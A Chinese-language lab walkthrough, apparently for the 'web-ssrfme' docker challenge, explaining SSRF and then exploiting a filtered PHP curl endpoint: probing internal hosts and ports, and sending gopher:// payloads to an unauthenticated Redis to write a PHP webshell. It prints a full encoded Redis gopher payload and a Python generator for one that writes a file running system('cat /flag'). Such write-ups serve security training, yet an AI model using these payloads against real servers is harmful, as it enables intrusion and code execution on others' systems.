快捷導(dǎo)航

Web-ssrfme:redis 未授權(quán)訪問攻擊的問題解決

更新時(shí)間：2025年04月01日 09:04:53 作者：Komorebi.py

本文主要介紹了Web-ssrfme:redis 未授權(quán)訪問攻擊的問題解決,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧

SSRF簡(jiǎn)介

SSRF（Server - Side Request Forgery，服務(wù)器端請(qǐng)求偽造）是一種網(wǎng)絡(luò)安全漏洞，攻擊者利用目標(biāo)服務(wù)器的漏洞，構(gòu)造惡意請(qǐng)求，讓服務(wù)器代替攻擊者去訪問其他內(nèi)部或外部資源，從而實(shí)現(xiàn)攻擊目的。以下是關(guān)于 SSRF 的詳細(xì)介紹：

原理

SSRF 漏洞通常發(fā)生在服務(wù)器端應(yīng)用程序中，這些應(yīng)用程序會(huì)根據(jù)用戶的輸入或其他條件發(fā)起對(duì)其他服務(wù)器或資源的請(qǐng)求。攻擊者通過(guò)構(gòu)造精心設(shè)計(jì)的請(qǐng)求，篡改目標(biāo)服務(wù)器的請(qǐng)求參數(shù)，使得服務(wù)器發(fā)送請(qǐng)求到攻擊者指定的目標(biāo)，而這個(gè)目標(biāo)可能是內(nèi)部網(wǎng)絡(luò)中的敏感服務(wù)器、外部的惡意服務(wù)器或者是一些受限制的資源。

攻擊方式

探測(cè)內(nèi)部網(wǎng)絡(luò)信息：攻擊者可以利用 SSRF 漏洞讓目標(biāo)服務(wù)器去訪問內(nèi)部網(wǎng)絡(luò)中的其他服務(wù)器，通過(guò)分析響應(yīng)信息來(lái)獲取內(nèi)部網(wǎng)絡(luò)的拓?fù)浣Y(jié)構(gòu)、服務(wù)器列表、端口開放情況等信息，為進(jìn)一步攻擊做準(zhǔn)備。
攻擊內(nèi)部服務(wù)：如果內(nèi)部網(wǎng)絡(luò)中的某些服務(wù)存在漏洞，攻擊者可以利用 SSRF 漏洞讓目標(biāo)服務(wù)器向這些服務(wù)發(fā)送惡意請(qǐng)求，從而觸發(fā)漏洞，實(shí)現(xiàn)對(duì)內(nèi)部服務(wù)的攻擊，如獲取敏感數(shù)據(jù)、執(zhí)行命令等。
發(fā)起中間人攻擊：攻擊者可以將目標(biāo)服務(wù)器作為中間人，通過(guò) SSRF 漏洞讓其向外部服務(wù)器發(fā)送請(qǐng)求，并在請(qǐng)求過(guò)程中篡改請(qǐng)求內(nèi)容或竊取響應(yīng)信息，從而實(shí)現(xiàn)對(duì)通信過(guò)程的監(jiān)聽和篡改。
利用第三方服務(wù)進(jìn)行攻擊：有些應(yīng)用程序會(huì)調(diào)用第三方服務(wù)來(lái)完成某些功能，攻擊者可以利用 SSRF 漏洞篡改對(duì)第三方服務(wù)的請(qǐng)求，讓目標(biāo)服務(wù)器向第三方服務(wù)發(fā)送惡意請(qǐng)求，利用第三方服務(wù)的漏洞來(lái)實(shí)現(xiàn)攻擊目的。

項(xiàng)目部署

首先下載web-ssrfme.zip，然后放到虛擬機(jī)內(nèi)，unzip解壓，然后CD到含有docker-compose.yml文件夾目錄下輸入指令進(jìn)行拖拽docker鏡像

docker-compose up -d

訪問網(wǎng)站

發(fā)現(xiàn)漏洞

 <?php
highlight_file(__file__);
function curl($url){  
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    echo curl_exec($ch);
    curl_close($ch);
}

if(isset($_GET['url'])){
    $url = $_GET['url'];

    if(preg_match('/file\:\/\/|dict\:\/\/|\.\.\/|127.0.0.1|localhost/is', $url,$match))
    {

        die('No, No, No!');
    }
    curl($url);
}
if(isset($_GET['info'])){
    phpinfo();
}
?>

源碼中過(guò)濾了file協(xié)議、dict協(xié)議、127.0.0.1和localhost

但沒有過(guò)濾http協(xié)議和gopher協(xié)議我們使用http協(xié)議進(jìn)行內(nèi)網(wǎng)主機(jī)存活探測(cè)。

?url=https://www.baidu.com

代碼中我們還可以查看phpinfo的信息

?info

查看該頁(yè)面信息發(fā)現(xiàn)當(dāng)前主機(jī)的內(nèi)網(wǎng)ip為172.18.0.3

探測(cè)該網(wǎng)段上存活的主機(jī)

?url=172.18.0.1:80

?url=172.18.0.2:80

說(shuō)明172.17.0.2是內(nèi)網(wǎng)中存活的另一臺(tái)主機(jī)，并且上面也運(yùn)行著http服務(wù)。但是當(dāng)前還不能找到攻下這臺(tái)內(nèi)網(wǎng)主機(jī)的突破口，我們可以使用ssrf掃描一下這個(gè)內(nèi)網(wǎng)主機(jī)的端口，這里使用burpsuite：

開始爆破

發(fā)現(xiàn)除了80端口有顯示，還有6379端口有一個(gè)報(bào)錯(cuò)，

這是redis的報(bào)錯(cuò)，這個(gè)錯(cuò)誤提示表明在執(zhí)行 Redis 的GET命令時(shí)，傳入的參數(shù)數(shù)量不正確。說(shuō)明這臺(tái)內(nèi)網(wǎng)主機(jī)上還運(yùn)行著redis服務(wù)。

redis 未授權(quán)訪問攻擊

接著我們便可以嘗試 redis 未授權(quán)了，由于這臺(tái)內(nèi)網(wǎng)主機(jī)上還存在一個(gè)http服務(wù)，所以我們可以將webshell寫入其web目錄，然后用ssrf進(jìn)行訪問。

這里我們可以利用gopherus工具，或者利用python代碼

第一次嘗試

./gopherus.py --exploit redis

當(dāng)然要將前面的ip改為172.18.0.2，因?yàn)檫@個(gè)ip下運(yùn)行著redis端口為6379

http://172.25.254.145:8091/?url=gopher://172.18.0.2:6379/_*1%0D%0A%248%0D%0Aflushall%0D%0A*3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2420%0D%0A%0A%0A%3C%3Fphp%20phpinfo()%3B%0A%0A%0D%0A*4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A*4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A*1%0D%0A%244%0D%0Asave%0D%0A%0A

猜測(cè)路徑不是默認(rèn)路徑/var/www/html,可能是其目錄下的子文件夾，我們使用burp掃一下都有哪些目錄，發(fā)現(xiàn)有個(gè)upload目錄。

訪問80端口的upload文件夾，發(fā)現(xiàn)是forbidden而不是not found

第二次嘗試

我們繼續(xù)利用工具進(jìn)行payload生成

發(fā)現(xiàn)還是不行，原因是沒有進(jìn)行url編碼

第三次嘗試

由于瀏覽器執(zhí)行代碼時(shí)會(huì)先進(jìn)行url解碼，所以我們需要將其進(jìn)行url編碼

測(cè)試，然后訪問文件

成功，進(jìn)入docker中查看該文件

docker exec -it b990fe7e910d /bin/bash

當(dāng)然還可以利用python代碼來(lái)實(shí)現(xiàn)構(gòu)造一個(gè)利用 Redis 漏洞來(lái)執(zhí)行特定命令的 Gopher 協(xié)議的請(qǐng)求 Payload，如下

import urllib.parse

protocol = "gopher://"
ip = "172.18.0.2"  # 運(yùn)行著redis的內(nèi)網(wǎng)主機(jī)ip
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "aaaa.php"
path = "/var/www/html/upload"
passwd = ""
cmd = [
    "flushall",
    f"set 1 {shell.replace(' ', '${IFS}')}",
    f"config set dir {path}",
    f"config set dbfilename {filename}",
    "save"
]

if passwd:
    cmd.insert(0, f"AUTH {passwd}")
payload = protocol + ip + ":" + port + "/_"


def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len(x.replace("${IFS}", " "))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd


if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)

結(jié)果：

gopher://172.18.0.2:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2432%0D%0A%0A%0A%3C%3Fphp%20system%28%22cat%20/flag%22%29%3B%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2420%0D%0A/var/www/html/upload%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%248%0D%0Aaaaa.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

同樣進(jìn)行url編碼

執(zhí)行它，同樣也在docker下的/var/www/html/upload生成了aaaa.php文件

訪問它

成功。

到此這篇關(guān)于Web-ssrfme:redis 未授權(quán)訪問攻擊的問題解決的文章就介紹到這了,更多相關(guān)Web-ssrfme:redis 未授權(quán)訪問攻擊內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家！

您可能感興趣的文章: